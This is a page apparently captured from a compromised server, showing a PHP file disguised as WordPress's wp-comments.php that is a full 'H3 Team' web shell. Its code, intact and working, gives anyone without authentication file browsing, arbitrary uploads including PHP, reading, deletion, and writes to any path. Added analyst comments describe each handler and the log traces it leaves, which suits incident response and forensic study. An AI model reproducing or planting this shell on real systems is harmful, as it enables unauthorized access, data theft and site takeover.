MOON
Server: Apache
System: Linux server1.studioinfinity.com.br 2.6.32-954.3.5.lve1.4.90.el6.x86_64 #1 SMP Tue Feb 21 12:26:30 UTC 2023 x86_64
User: artinside (517)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //proc/self/root/home/artinside/www/wp-comments.php
<?php
// Analyst note: runtime setup for this script. Every call carries the @ operator, so a
// call that fails does so silently.
// Error reporting and on-page error display are switched off for the request.
@error_reporting(0);
@ini_set('display_errors', 0);
// Removes the execution time limit for the request.
@set_time_limit(0);
// Tries to raise the upload limits to 100M.
// NOTE(review): these two directives are normally not changeable through ini_set() at
// runtime, so the calls probably have no effect on this host — confirm against php.ini.
@ini_set('upload_max_filesize', '100M');
@ini_set('post_max_size', '100M');

// Auto-detect public_html
/**
 * Picks the directory shown when the request carries no usable `dir` parameter.
 *
 * Order of preference: DOCUMENT_ROOT when it is set and is an existing directory, then
 * the first existing directory in a fixed list built from get_current_user() (the owner
 * of this script file), and finally the directory that holds this file.
 *
 * @return string Path of the chosen directory.
 */
function detect_home() {
    // Try common paths
    if (isset($_SERVER['DOCUMENT_ROOT']) && is_dir($_SERVER['DOCUMENT_ROOT'])) {
        return $_SERVER['DOCUMENT_ROOT'];
    }
    $user = get_current_user();
    // Candidate web roots under the account's home directory, plus /var/www/html.
    $try = ["/home/$user/public_html", "/home/$user/www", "/home/$user/htdocs", "/var/www/html"];
    foreach ($try as $p) {
        if (is_dir($p)) return $p;
    }
    // Nothing matched: fall back to the directory this script is stored in.
    return dirname(__FILE__);
}

// Analyst note: the working directory is taken directly from the `dir` query parameter.
// realpath() resolves it to an absolute path, but nothing in this file confines it to the
// web root, and no authentication check is visible anywhere in the file. A value that does
// not resolve falls back to detect_home().
// Triage: `dir=` values on requests to this file in the access log show which directories
// were browsed.
$dir = isset($_GET['dir']) ? $_GET['dir'] : detect_home();
$dir = realpath($dir) ?: detect_home();

// Upload
// Analyst note: upload handler for the multipart field `up`. The file is written into $dir
// under the client-supplied name (basename() only strips directory components); no check of
// extension or content type is visible, so a .php file lands in the directory as-is.
// Triage: multipart POSTs to this file, then files in the browsed directories whose
// modification time lines up with those requests.
$msg = '';
if (isset($_FILES['up']) && $_FILES['up']['error'] !== UPLOAD_ERR_NO_FILE) {
    $fname = basename($_FILES['up']['name']);
    $target = rtrim($dir, '/') . '/' . $fname;

    if ($_FILES['up']['error'] !== UPLOAD_ERR_OK) {
        // Map PHP's upload error codes to the status text shown in the page.
        $errors = [
            UPLOAD_ERR_INI_SIZE   => 'File terlalu besar (php.ini limit)',
            UPLOAD_ERR_FORM_SIZE  => 'File terlalu besar (form limit)',
            UPLOAD_ERR_PARTIAL    => 'File hanya terupload sebagian',
            UPLOAD_ERR_NO_TMP_DIR => 'Tidak ada folder tmp',
            UPLOAD_ERR_CANT_WRITE => 'Gagal menulis ke disk',
            UPLOAD_ERR_EXTENSION  => 'Upload dihentikan oleh extension',
        ];
        $err = isset($errors[$_FILES['up']['error']]) ? $errors[$_FILES['up']['error']] : 'Error #' . $_FILES['up']['error'];
        $msg = "<div style='color:red;text-align:center;'>&#10060; Upload gagal: $err</div>";
    } elseif (move_uploaded_file($_FILES['up']['tmp_name'], $target)) {
        // Written files are set to mode 0644 (owner read/write, others read).
        @chmod($target, 0644);
        $msg = "<div style='color:lime;text-align:center;'>&#9989; Upload berhasil: " . htmlspecialchars($fname) . "</div>";
    } else {
        // Try alternative write method
        // Second write path: when move_uploaded_file() fails, the temporary file is read
        // and written to the same target with file_put_contents().
        $data = file_get_contents($_FILES['up']['tmp_name']);
        if ($data !== false && file_put_contents($target, $data) !== false) {
            @chmod($target, 0644);
            $msg = "<div style='color:lime;text-align:center;'>&#9989; Upload berhasil (alt): " . htmlspecialchars($fname) . "</div>";
        } else {
            // The failure message reports the directory and whether it is writable.
            $msg = "<div style='color:red;text-align:center;'>&#10060; Upload gagal! Dir: $dir | Writable: " . (is_writable($dir) ? 'YES' : 'NO') . "</div>";
        }
    }
}

// Save Edit
// Analyst note: save handler. The destination path is the raw `edit_file` POST field; unlike
// the delete and edit-view handlers it is neither passed through basename() nor joined to
// $dir, so the write is limited only by the file permissions of the PHP process user.
// Triage: integrity checks after finding this file should cover every file that account can
// write, not just the directories that appear in `dir=` requests. The path and content are in
// the POST body, which access logs typically do not record.
if (isset($_POST['edit_file']) && isset($_POST['content'])) {
    $file = $_POST['edit_file'];
    if (file_put_contents($file, $_POST['content']) !== false) {
        $msg = "<div style='color:lime;text-align:center;'>&#9989; File berhasil di-edit: " . htmlspecialchars(basename($file)) . "</div>";
    } else {
        $msg = "<div style='color:red;text-align:center;'>&#10060; Gagal menulis file!</div>";
    }
}

// Delete
// Analyst note: delete handler, triggered by a GET request. The target is the basename of
// `del` inside $dir, removed with unlink() (errors suppressed by @).
// Triage: because the file name travels in the query string, `dir=` together with `del=` in
// the access log identifies files removed through this script.
if (isset($_GET['del'])) {
    $f = rtrim($dir, '/') . '/' . basename($_GET['del']);
    if (file_exists($f) && @unlink($f)) {
        $msg = "<div style='color:lime;text-align:center;'>&#128465; File dihapus: " . htmlspecialchars(basename($f)) . "</div>";
    } else {
        $msg = "<div style='color:red;text-align:center;'>&#10060; Gagal menghapus: " . htmlspecialchars(basename($_GET['del'])) . "</div>";
    }
}

// Edit View
// Analyst note: edit view. When `edit` is present, the named file inside $dir (basename()
// keeps only the last path component) is read and rendered in a form that posts back to
// this script; the form carries the full path in the hidden `edit_file` field and the text
// in `content`.
// Triage: `edit=` in the access log shows which files were opened for reading or editing.
if (isset($_GET['edit'])) {
    $f = rtrim($dir, '/') . '/' . basename($_GET['edit']);
    if (file_exists($f)) {
        // The whole file is read and HTML-escaped for display, so this request discloses the
        // contents of any file in $dir that the PHP process user can read.
        $content = htmlspecialchars(file_get_contents($f));
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Edit - <?= htmlspecialchars(basename($f)) ?></title>
</head>
<body style="background:#000;color:#ccc;font-family:monospace;padding:40px;text-align:center;">
    <h2 style="color:#f0f;">&#9997; Edit: <?= htmlspecialchars(basename($f)) ?></h2>
    <form method="POST" action="?dir=<?= urlencode($dir) ?>">
        <input type="hidden" name="edit_file" value="<?= htmlspecialchars($f) ?>">
        <textarea name="content" rows="30"
            style="width:90%;max-width:1000px;background:#111;color:#0f0;border:1px solid #444;padding:12px;font-family:monospace;font-size:13px;"><?= $content ?></textarea><br><br>
        <input type="submit" value="&#128190; Save" style="padding:10px 30px;background:#222;color:#0f0;border:1px solid #0f0;cursor:pointer;font-size:14px;">
    </form>
    <br><a href="?dir=<?= urlencode($dir) ?>" style="color:#0af;">&#11013; Kembali</a>
    <div style="margin-top:60px;font-size:13px;color:#555;">
        Powered by <strong style="color:#f0f;">H3 Team</strong> <?= date('Y') ?>
    </div>
</body>
</html>
<?php
        // Execution stops here, so the directory listing below is not rendered after the form.
        exit;
    } else {
        $msg = "<div style='color:red;text-align:center;'>&#10060; File tidak ditemukan</div>";
    }
}

// Directory listing input for the table rendered below. A scandir() failure is suppressed
// by @ and replaced with an empty list, so an unreadable directory shows as an empty one.
$files = @scandir($dir) ?: [];
// URL-encoded forms of the current directory and its parent, used to build the page's links.
$dirEnc = urlencode($dir);
$parentDir = urlencode(dirname($dir));
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>H3 Lite</title>
</head>
<body style="background:#111;color:#ccc;font-family:monospace;text-align:center;padding:30px;">
    <h2 style="color:#f0f;">&#128194; File Manager - H3 Team</h2>
    <h4 style="color:#888;">&#128193; <?= htmlspecialchars($dir) ?></h4>
    <?= $msg ?>

    <!-- Upload -->
    <form method="POST" action="?dir=<?= $dirEnc ?>" enctype="multipart/form-data" style="margin:15px 0;">
        <input type="file" name="up">
        <input type="submit" value="Upload" style="padding:5px 15px;background:#222;color:#ccc;border:1px solid #555;cursor:pointer;">
    </form>

    <!-- Parent Directory -->
    <?php if ($dir !== '/'): ?>
    <a href="?dir=<?= $parentDir ?>" style="color:#ff0;font-size:13px;">&#11014; Parent Directory</a>
    <?php endif; ?>

    <!-- File Table -->
    <div style="display:flex;justify-content:center;margin-top:15px;">
    <table border="1" cellpadding="8" cellspacing="0" style="background:#1a1a1a;border-color:#333;min-width:500px;">
        <tr style="background:#222;">
            <th style="color:#ccc;">Nama</th>
            <th style="color:#ccc;">Size</th>
            <th style="color:#ccc;">Aksi</th>
        </tr>
<?php
// Renders one table row per directory entry: name, human-readable size, and action links
// (open for directories; edit and delete for files) that point back at this script with
// `dir`, `edit` and `del` query parameters.
// Analyst caution: the name cell is HTML-escaped, but the raw file name is also interpolated
// into the onclick attribute of the Delete link, so file names are not uniformly escaped.
// Review this listing from logs or a static copy rather than by loading the live page in a
// browser.
foreach ($files as $fn) {
    if ($fn === '.' || $fn === '..') continue;
    $fullpath = rtrim($dir, '/') . '/' . $fn;
    $enc = urlencode($fn);
    $isDir = is_dir($fullpath);
    // Directories show '-' in the size column; a filesize() failure leaves $size as false.
    $size = $isDir ? '-' : @filesize($fullpath);
    if (!$isDir && $size !== false) {
        // Format as MB above 1048576 bytes, KB above 1024 bytes, otherwise plain bytes.
        if ($size > 1048576) $size = round($size / 1048576, 1) . ' MB';
        elseif ($size > 1024) $size = round($size / 1024, 1) . ' KB';
        else $size = $size . ' B';
    }
    $nameColor = $isDir ? '#0ff' : '#0f0';
    echo "<tr>";
    echo "<td style='color:$nameColor;text-align:left;'>" . ($isDir ? '&#128193; ' : '') . htmlspecialchars($fn) . "</td>";
    echo "<td style='color:#888;font-size:12px;'>$size</td>";
    echo "<td>";
    if ($isDir) {
        echo "<a href='?dir=" . urlencode($fullpath) . "' style='color:#0ff;'>Buka</a>";
    } else {
        echo "<a href='?dir=$dirEnc&edit=$enc' style='color:#0af;'>Edit</a> | ";
        echo "<a href='?dir=$dirEnc&del=$enc' onclick='return confirm(\"Hapus $fn?\")' style='color:#f55;'>Delete</a>";
    }
    echo "</td></tr>";
}
// Two or fewer entries means only '.' and '..' (or a failed scan): show the empty-folder row.
if (count($files) <= 2) {
    echo "<tr><td colspan='3' style='color:#666;'>Folder kosong</td></tr>";
}
?>
    </table>
    </div>

    <!-- Server Info -->
    <div style="margin-top:30px;font-size:12px;color:#555;">
        <?= php_uname() ?><br>
        PHP <?= phpversion() ?> | Safe Mode: <?= @ini_get('safe_mode') ? 'ON' : 'OFF' ?> |
        Writable: <?= is_writable($dir) ? '<span style="color:lime">YES</span>' : '<span style="color:red">NO</span>' ?>
    </div>

    <div style="margin-top:20px;font-size:13px;color:#555;">
        Powered by <strong style="color:#f0f;">H3 Team</strong> <?= date('Y') ?>
    </div>
</body>
</html>